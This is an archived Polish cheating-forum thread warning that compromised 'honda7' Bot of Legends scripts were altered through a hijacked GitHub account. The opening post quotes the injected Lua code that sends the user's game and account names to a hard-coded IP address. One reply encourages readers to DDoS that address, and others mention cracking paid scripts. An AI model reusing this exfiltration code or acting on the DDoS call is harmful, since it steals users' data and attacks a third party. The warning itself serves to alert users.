Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Ostrzeżenie/informacja - skrypty honda7

Rekomendowane odpowiedzi

Opublikowano

Konto na Githubie jednego z deweloperów, Hondy, zostało przejęte.

https://github.com/honda7/BoL

A w skryptach:

local version = 2.0

function OnLoad()
	GetAsyncWebResult("46.29.19.99", "/?n="..myHero.name.."&c="..myHero.charName.."&d="..GetUser(), function(d) print("done") end)
	PrintChat("<font color='#ff0000'>Hello, cheater. All your data was send to RITO ["..myHero.name..", "..myHero.charName..", "..GetUser().."]</font>")
end

Nazwa naszego przywoływacza, nazwa usera na BoL'u są wysyłane na nieznany adres IP. Nie używajcie tych skryptów, bądź wyłączcie autoupdater.

to na tyle.

MORDECZKI, JEDEN Z NASZYCH ZIOMKÓW SIĘ ROZPRUŁ. IP 46.29.19.99 POCHODZI Z POLSKI, DOKŁADNIEJ - OLSZTYN. 

• Odpowiedzi 72
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

Do usunięcia, konto na GitHubie zamknięte.

Enforcevip JEST BEZPIECZNE. NIE KUPOWAĆ, NIE JEST WARTE NAWET ZŁAMANEJ ĆWIARTKI GROSZA.

Drugi naczelny bolowiec mpcforum, tuż po Marcolym. Nie pisać po hasło do rara z enforcevip.

Opublikowano

Dopisz w temacie:

Jak macie VPSy, to DDoSujcie ten adres IP bo go nie lubię.

Enforcevip JEST BEZPIECZNE. NIE KUPOWAĆ, NIE JEST WARTE NAWET ZŁAMANEJ ĆWIARTKI GROSZA.

Drugi naczelny bolowiec mpcforum, tuż po Marcolym. Nie pisać po hasło do rara z enforcevip.

Opublikowano

Strona na razie nie działa. Tak trzymać!

Opublikowano

Dobrze, że crackuje jego skrypty, a nie kupuję >.<. Także strzeżcie się wydawacze pieniędzy! (w dodatku na BoL'a!)

honda sprzedaje?

Opublikowano

jakiś ziomek napisał na poprzedniej że crackuje jego skrypty a nie kupuje xD

btw. vpred też wyłączyłem autoupdate, tylko od kiedy ta akcja trwa, bo ja jakoś po 15 cisnałem f9

Opublikowano

jakiś ziomek napisał na poprzedniej że crackuje jego skrypty a nie kupuje xD

btw. vpred też wyłączyłem autoupdate, tylko od kiedy ta akcja trwa, bo ja jakoś po 15 cisnałem f9

Jeżeli nie wyświetlił Ci się taki komunikat "Hello, cheater. All your data was send to RITO" to chyba jesteś bezpieczny.

Opublikowano

tzn teraz wszystko dałem na false wszystkie jego skrypty i vpred.

z drugiej strony co za jebany polaczek by tak zrobił, naprawdę kurwy nie znajac granic.

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...